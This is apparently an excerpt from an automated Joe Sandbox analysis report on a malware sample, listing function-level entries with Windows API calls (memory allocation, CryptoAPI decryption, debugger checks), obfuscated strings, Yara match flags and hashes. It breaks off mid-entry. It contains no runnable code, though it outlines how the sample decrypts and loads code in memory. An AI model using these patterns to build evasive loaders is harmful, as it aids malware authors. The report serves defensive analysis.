                                                    • Instruction Fuzzy Hash: 02E0ECB040C309DFE7002F08C89466DBBE4EF11705F118C1C9AD642212E67948509B4A
                                                    APIs
                                                    • _free.LIBCMT ref: 10005C07
                                                      • Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
                                                      • Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2705826801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000000.00000002.2705802007.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705853981.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705880835.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_10000000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: ErrorFreeHeapLast_free
                                                    • String ID:
                                                    • API String ID: 1353095263-0
                                                    • Opcode ID: d102fdbbc19008656020672b0513dbd0600b00c460041e1c03a0ef10da910664
                                                    • Instruction ID: c87f8b0a48b83a8a7248450826a19003e4aa18d6d81e39a7cffe4d34c565a0dd
                                                    • Opcode Fuzzy Hash: d102fdbbc19008656020672b0513dbd0600b00c460041e1c03a0ef10da910664
                                                    • Instruction Fuzzy Hash: D9C04C75500208BBDB05DF45DD06A4E7BA9EB812A4F204054F41567291DAB5EF449691
                                                    APIs
                                                    • _free.LIBCMT ref: 0040E27B
                                                      • Part of subcall function 00411AC2: RtlFreeHeap.NTDLL(00000000,00000000,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?), ref: 00411AD8
                                                      • Part of subcall function 00411AC2: GetLastError.KERNEL32(?,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?,?), ref: 00411AEA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702285605.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2702285605.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: ErrorFreeHeapLast_free
                                                    • String ID:
                                                    • API String ID: 1353095263-0
                                                    • Opcode ID: db01065975d67949ddfc68d95b64cc0fb921476d903cbe9e9cdf5676f9f73183
                                                    • Instruction ID: def2e2de252ffdbb94672f6279d5865abf5ab7644d9ffbe49541578f7e328dd5
                                                    • Opcode Fuzzy Hash: db01065975d67949ddfc68d95b64cc0fb921476d903cbe9e9cdf5676f9f73183
                                                    • Instruction Fuzzy Hash: 82C08C31100208BBCB00DB46C806B8E7FA8DB803A8F204049F40417251DAB1EE409680
                                                    APIs
                                                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 00F8A16E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2703351422.0000000000F89000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F89000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_f89000_3K6rBUOQ2z.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                    • Instruction ID: dfe9a1f9607db7075932e178fb7495390c159b833725765f0e1af3b6d7dc9e35
                                                    • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                    • Instruction Fuzzy Hash: 02113C79A00208EFDB01DF98C989E98BBF5EF08350F058095F9489B362D775EA50EF81
                                                    APIs
                                                    • VirtualAlloc.KERNEL32(?,?,?,?), ref: 00402BFF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702285605.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2702285605.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: ca1f9d2fe36c7284753979306af93d0cb1d2fe33a661f06d3f51028e1cfc8f97
                                                    • Instruction ID: c3e6f36c677934e3fb1d6ceeea9da9d01375f90aa72a3d22a0593b590ebbe711
                                                    • Opcode Fuzzy Hash: ca1f9d2fe36c7284753979306af93d0cb1d2fe33a661f06d3f51028e1cfc8f97
                                                    • Instruction Fuzzy Hash: F7C0013200020DFBCF025F81EC0489A7F2AEB09264F008020FA1804021C7329931ABA9
                                                    APIs
                                                    • VirtualFree.KERNELBASE(?,?,?), ref: 00402C1C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702285605.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2702285605.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: FreeVirtual
                                                    • String ID:
                                                    • API String ID: 1263568516-0
                                                    • Opcode ID: 5ceef4664e2463bb707098a5d0699c231cbc0156091deadbe1fb1452187b7f9f
                                                    • Instruction ID: 60d78a83612f02709208ad56537e98f16bf966ab6139b9664c308e167d28ca00
                                                    • Opcode Fuzzy Hash: 5ceef4664e2463bb707098a5d0699c231cbc0156091deadbe1fb1452187b7f9f
                                                    • Instruction Fuzzy Hash: 61B0923244020CFBCF021F81EC048D93F2AFB08264F008024FA1C44031C733D531AB84
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2704847781.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b40000_3K6rBUOQ2z.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: DFEK$FOKD$]DFE$rB$rB$rB$rB$rB
                                                    • API String ID: 0-735762442
                                                    • Opcode ID: b634da6b4ff11c5db356e861f82a2c18836c59c7cb790a52b1b2f21f6beabc7d
                                                    • Instruction ID: f9dcea7f7b74f7a7a3300ace79cc6978366e73db8824ea66bee9f315b22b43fa
                                                    • Opcode Fuzzy Hash: b634da6b4ff11c5db356e861f82a2c18836c59c7cb790a52b1b2f21f6beabc7d
                                                    • Instruction Fuzzy Hash: EAE2C2B0D002589BEB24EF68CC54BEDBB74EF91308F1041D8D5496B281DB757A88EFA5
                                                    APIs
                                                    • CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,0042A018), ref: 04B437A7
                                                    • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 04B437CB
                                                    • _mbstowcs.LIBCMT ref: 04B4381E
                                                    • CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 04B43835
                                                    • GetLastError.KERNEL32 ref: 04B4383F
                                                    • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 04B43867
                                                    • GetLastError.KERNEL32 ref: 04B43871
                                                    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 04B43881
                                                    • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 04B43943
                                                    • CryptDestroyKey.ADVAPI32(?), ref: 04B439B5
                                                    Strings
                                                    • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 04B43783
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2704847781.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b40000_3K6rBUOQ2z.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease_mbstowcs
                                                    • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                                                    • API String ID: 3642901890-63410773
                                                    • Opcode ID: e8a2417c6fd1f5a0234f20e664ae74c119de5196ead524865740bbc4210dc3f9
                                                    • Instruction ID: 4fe274e54d431eebfbc365bd5b69b411441be6651f31eb9a9068311ca2197b44
                                                    • Opcode Fuzzy Hash: e8a2417c6fd1f5a0234f20e664ae74c119de5196ead524865740bbc4210dc3f9
                                                    • Instruction Fuzzy Hash: F6818471B00218AFEF209F24CC45B9ABBB5FF89300F0481E5E94DE7290DB319A849F55
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702508722.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_819000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 8<n$Z%v$g4O$lqs>$~7~_$.C$kv
                                                    • API String ID: 0-1601858490
                                                    • Opcode ID: 4f60de319900b7243a91629348964225b8e954e4c4d0eb317a3c7cb7a71d353a
                                                    • Instruction ID: b1645dc57e4d3e4262f143c7a64ddcac4c0c8d1bdb029941806f5f608121dfee
                                                    • Opcode Fuzzy Hash: 4f60de319900b7243a91629348964225b8e954e4c4d0eb317a3c7cb7a71d353a
                                                    • Instruction Fuzzy Hash: 6CA2F7F3A0C2149FE3046E2DEC8577ABBE9EF94320F1A493DEAC4C7744E53598058696
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702285605.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2702285605.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: __floor_pentium4
                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                    • API String ID: 4168288129-2761157908
                                                    • Opcode ID: 14c724df0906a7543d709f4d96d1b8b7f4ee31c8485c5baae612bd997d7771c3
                                                    • Instruction ID: d7ffb76180c9728a397d1ccf0e686cee7d0516322be8d88619d78ced8c4d9a03
                                                    • Opcode Fuzzy Hash: 14c724df0906a7543d709f4d96d1b8b7f4ee31c8485c5baae612bd997d7771c3
                                                    • Instruction Fuzzy Hash: F1C22A72E042288FDB25CE28DD507EAB3B5EB49314F1441ABD84DE7280E779AEC58F45
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702508722.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_819000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: *F?J$*F?J$h]\n$|7Vk
                                                    • API String ID: 0-4188360615
                                                    • Opcode ID: f8cb43ccd476b6544b05929153de1e98b28f95fc28d8bff16a0455d1b8ff421e
                                                    • Instruction ID: 96bf8c9226e291abf00c1b65f4656b3ecd9317e37720bf4732e0bcff85f586db
                                                    • Opcode Fuzzy Hash: f8cb43ccd476b6544b05929153de1e98b28f95fc28d8bff16a0455d1b8ff421e
                                                    • Instruction Fuzzy Hash: B2B21AF360C2009FE304AE2DEC8567AB7E6EFD4720F1A893DE6C5C7744E93598058696
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702508722.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_819000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: '$q/}$vZq$Bg>
                                                    • API String ID: 0-2143849517
                                                    • Opcode ID: a8340729bfd2f127b7bdf0ff4709fab583ba743675d19311650b4fea9d44f0fa
                                                    • Instruction ID: 91bb78711750cd309f89f876a24718adf96e60b2365d88a155d56ed556f6e6b4
                                                    • Opcode Fuzzy Hash: a8340729bfd2f127b7bdf0ff4709fab583ba743675d19311650b4fea9d44f0fa
                                                    • Instruction Fuzzy Hash: B4B206F3A0C2109FE714AE29DC8567AF7E5EF94720F1A493DEAC4C3744E63598008697
                                                    APIs
                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 04B49A25
                                                    • IsDebuggerPresent.KERNEL32 ref: 04B49AF1
                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 04B49B11
                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 04B49B1B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2704847781.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b40000_3K6rBUOQ2z.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                    • String ID:
                                                    • API String ID: 254469556-0
                                                    • Opcode ID: 3d6f7e7e6d2dce829ef9a538eb3787554eded577627c7bcf21dfb5f8b50c02c3
                                                    • Instruction ID: 3f826736889305ecb234e0bb4f6114a69f31afa50bf0e8fcc6e92b3813a43dd4
                                                    • Opcode Fuzzy Hash: 3d6f7e7e6d2dce829ef9a538eb3787554eded577627c7bcf21dfb5f8b50c02c3
                                                    • Instruction Fuzzy Hash: AC311AB5D4121C9BDB20DFA4D989BCDBBB8BF48304F1040EAE409A7250EB715A85DF04
                                                    APIs
                                                    • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 10002FE6
                                                    • IsDebuggerPresent.KERNEL32 ref: 100030B2
                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 100030D2
                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 100030DC
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2705826801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000000.00000002.2705802007.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705853981.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705880835.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_10000000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                    • String ID:
                                                    • API String ID: 254469556-0
                                                    • Opcode ID: fd06b871e9cf82683454e3fbfac267bd1ef2951c7b429272aa340f07bdb4f9c2
                                                    • Instruction ID: 336d1356b37294b5c1fe5cc3e7a5e53ac0bdfc53d52c9a9f50db52ddd632742b
                                                    • Opcode Fuzzy Hash: fd06b871e9cf82683454e3fbfac267bd1ef2951c7b429272aa340f07bdb4f9c2
                                                    • Instruction Fuzzy Hash: B6312B75D45269DBEB21DF64C989BCDBBF8EF08340F1081AAE40DA7250EB719A85CF04
                                                    APIs
                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 004097BE
                                                    • IsDebuggerPresent.KERNEL32 ref: 0040988A
                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004098AA
                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 004098B4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702285605.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2702285605.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                    • String ID:
                                                    • API String ID: 254469556-0
                                                    • Opcode ID: 3d6f7e7e6d2dce829ef9a538eb3787554eded577627c7bcf21dfb5f8b50c02c3
                                                    • Instruction ID: c565fb8366faf90fb764b1371249259a4a166a2e914fc73a985bf40890c2a5d7
                                                    • Opcode Fuzzy Hash: 3d6f7e7e6d2dce829ef9a538eb3787554eded577627c7bcf21dfb5f8b50c02c3
                                                    • Instruction Fuzzy Hash: AB312BB5D1131CDBDB10EF65D9897CDBBB8BF18304F1040AAE409A7290EB755A85CF49
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000003.1864568328.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_3_4ce0000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 0,@$@$@,@$`,@
                                                    • API String ID: 0-1654315312
                                                    • Opcode ID: 5b4dbf54bdba94f60b787558392db44d93cafa9daf967c2ab35a05ecdb66b168
                                                    • Instruction ID: d0229a7677e4139180f17e2684249ffde0658b308fba598201ba1c91857123c9
                                                    • Opcode Fuzzy Hash: 5b4dbf54bdba94f60b787558392db44d93cafa9daf967c2ab35a05ecdb66b168
                                                    • Instruction Fuzzy Hash: D2128C71B012099FDB14CF9AD980BBDB7BAFF48314F1441A9E909AB281DB74F941CB90
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702508722.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_819000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ,:<:$=61y$:N$;~
                                                    • API String ID: 0-1961751417
                                                    • Opcode ID: 264cbdb9aa185668be83a99fc867fba0c253893d1843867acbf0566d4fa194fd
                                                    • Instruction ID: a526b51624e70bfda878e5c78268556d7486c0c03e7eb59864a4e908a8007063
                                                    • Opcode Fuzzy Hash: 264cbdb9aa185668be83a99fc867fba0c253893d1843867acbf0566d4fa194fd
                                                    • Instruction Fuzzy Hash: 564149F7A0C1005BF30C9A3DDC6577AB7D5EBD4320F1A863DFA8AC3B84E86A89054195
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702508722.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_819000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: "AGo$"AGo$K_
                                                    • API String ID: 0-3833813495
                                                    • Opcode ID: 0ed953b9b7391539ced97191ed02e4070a175017db4580fc558cf0b1d4fde580
                                                    • Instruction ID: dd6efce2a2f297b330320d6fada79172dc652d417a842c20feca8b8bf93de0ae
                                                    • Opcode Fuzzy Hash: 0ed953b9b7391539ced97191ed02e4070a175017db4580fc558cf0b1d4fde580
                                                    • Instruction Fuzzy Hash: C59208F3608200AFE704AE2DEC8567AB7E9EFD4720F1A853DE6C5C7744E93598018796
                                                    APIs
                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 04B4C412
                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 04B4C41C
                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 04B4C429
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2704847781.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b40000_3K6rBUOQ2z.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                    • String ID:
                                                    • API String ID: 3906539128-0
                                                    • Opcode ID: 131c0d4e7d26b594cba5fcb71e5b1937b03cc24f2ec617643b077344ff1b42c4
                                                    • Instruction ID: 46b9c7b27c31c4f677a546c9b3137b8e337d51f6eae02f45cfbb35a4547c6502
                                                    • Opcode Fuzzy Hash: 131c0d4e7d26b594cba5fcb71e5b1937b03cc24f2ec617643b077344ff1b42c4
                                                    • Instruction Fuzzy Hash: 5831C7B490122CABCB61DF28DD887DDBBB4BF48710F5041EAE41CA7250E770AB859F49
                                                    APIs
                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 10005798
                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 100057A2
                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 100057AF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2705826801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000000.00000002.2705802007.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705853981.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705880835.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_10000000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                    • String ID:
                                                    • API String ID: 3906539128-0
                                                    • Opcode ID: ce89a4acebe00847e0bf7db2b2a5c1550e22667e6ae7b5dc377587a900902601
                                                    • Instruction ID: 5682311db8f2ea5b7fb0b10b77ab1de1cec722dcfd082a676ba882e0b3775376
                                                    • Opcode Fuzzy Hash: ce89a4acebe00847e0bf7db2b2a5c1550e22667e6ae7b5dc377587a900902601
                                                    • Instruction Fuzzy Hash: 4B31D3749012299BDB62DF24DD89B8DBBB8EF08750F5081EAE41CA7250EB709F858F44
                                                    APIs
                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0040C1AB
                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0040C1B5
                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0040C1C2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702285605.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2702285605.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                    • String ID:
                                                    • API String ID: 3906539128-0
                                                    • Opcode ID: b149471185ea7cab19788dd3e2c66aa1f526c3a9366d234e05bd43495572b69a
                                                    • Instruction ID: dd4c83c30a1d2e7c36c102c60c461113305a32f1f02fbca7a201bc05c8f10de1
                                                    • Opcode Fuzzy Hash: b149471185ea7cab19788dd3e2c66aa1f526c3a9366d234e05bd43495572b69a
                                                    • Instruction Fuzzy Hash: 3031E774901228EBCB21DF65D8897CDBBB4BF18310F5041EAE40CA7291E7349F858F49
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(?,?,04B4F173,00000000,0041D0A0,?,00000000,?,04B51714), ref: 04B4F196
                                                    • TerminateProcess.KERNEL32(00000000,?,04B4F173,00000000,0041D0A0,?,00000000,?,04B51714), ref: 04B4F19D
                                                    • ExitProcess.KERNEL32 ref: 04B4F1AF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2704847781.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b40000_3K6rBUOQ2z.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Process$CurrentExitTerminate
                                                    • String ID:
                                                    • API String ID: 1703294689-0
                                                    • Opcode ID: 0681eec8a10bae1972cdd76b7596642c5d6b23a8fea5b51096d6af8d336d3898
                                                    • Instruction ID: 5a0b6906482cab578f04eaf4a73385882b6fb4f46445c91b1b3a9aa926e356b2
                                                    • Opcode Fuzzy Hash: 0681eec8a10bae1972cdd76b7596642c5d6b23a8fea5b51096d6af8d336d3898
                                                    • Instruction Fuzzy Hash: 0FE0B671844118AFDB117F54DD48A993B69FF90685F004464F80587231CB76E991DB94
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(?,?,10005F24,?,?,?,?,?,10001F4F), ref: 10005F47
                                                    • TerminateProcess.KERNEL32(00000000,?,10005F24,?,?,?,?,?,10001F4F), ref: 10005F4E
                                                    • ExitProcess.KERNEL32 ref: 10005F60
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2705826801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000000.00000002.2705802007.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705853981.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705880835.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_10000000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: Process$CurrentExitTerminate
                                                    • String ID:
                                                    • API String ID: 1703294689-0
                                                    • Opcode ID: 25e154c42a67dcf87d00edb929b2d1476c3327d7ef7788f8d8e64d02c0ecb1df
                                                    • Instruction ID: 146749da7bea6e31057676a24497a7e39fcb2650f4e844f2ac51073fb5c6c599
                                                    • Opcode Fuzzy Hash: 25e154c42a67dcf87d00edb929b2d1476c3327d7ef7788f8d8e64d02c0ecb1df
                                                    • Instruction Fuzzy Hash: 02E08631404589EFEF069F10CD4CA993B69FB442C2B008024F50D8A135CB7AEDD1CB41
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702508722.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_819000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: -o}$Y5mZ$qWv{
                                                    • API String ID: 0-2164058010
                                                    • Opcode ID: 80046ece4595babee44f98680390b85e29ae3d413c71f54f7d42ae13ad79b30d
                                                    • Instruction ID: 2422aa052157307881ae451ba190d432ef571a874bbb8fb325d09c33c330d534
                                                    • Opcode Fuzzy Hash: 80046ece4595babee44f98680390b85e29ae3d413c71f54f7d42ae13ad79b30d
                                                    • Instruction Fuzzy Hash: EF6158F3E085144BE3046D2DEC15736BACAEB94760F2B863D9A88D7788F979490542C1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2704847781.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b40000_3K6rBUOQ2z.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: .$GetProcAddress.$l
                                                    • API String ID: 0-2784972518
                                                    • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                    • Instruction ID: d5037ae184a1353f3a29f5d41dbbdc7d36793d66b344cbbfc880b87a4d66a8bb
                                                    • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                    • Instruction Fuzzy Hash: FB316CB6910609DFEB10DF99C880AAEBBF5FF48324F14408AD941A7310D771FA45DBA4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000003.1864568328.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_3_4ce0000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 49dfbd2288928feededa099d44ae440f86fb38599ad47adeb3a8dcc3b0116a46
                                                    • Instruction ID: 02789542c2a9dd6b1b9024e0eb83ec463df33c94b6ca43b61aaec5cd597af798
                                                    • Opcode Fuzzy Hash: 49dfbd2288928feededa099d44ae440f86fb38599ad47adeb3a8dcc3b0116a46
                                                    • Instruction Fuzzy Hash: 31F14E71E002199FDF14CFA9D8806AEBBF2FF88354F15866DD919AB344D731AA01CB94
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2704847781.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b40000_3K6rBUOQ2z.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 49dfbd2288928feededa099d44ae440f86fb38599ad47adeb3a8dcc3b0116a46
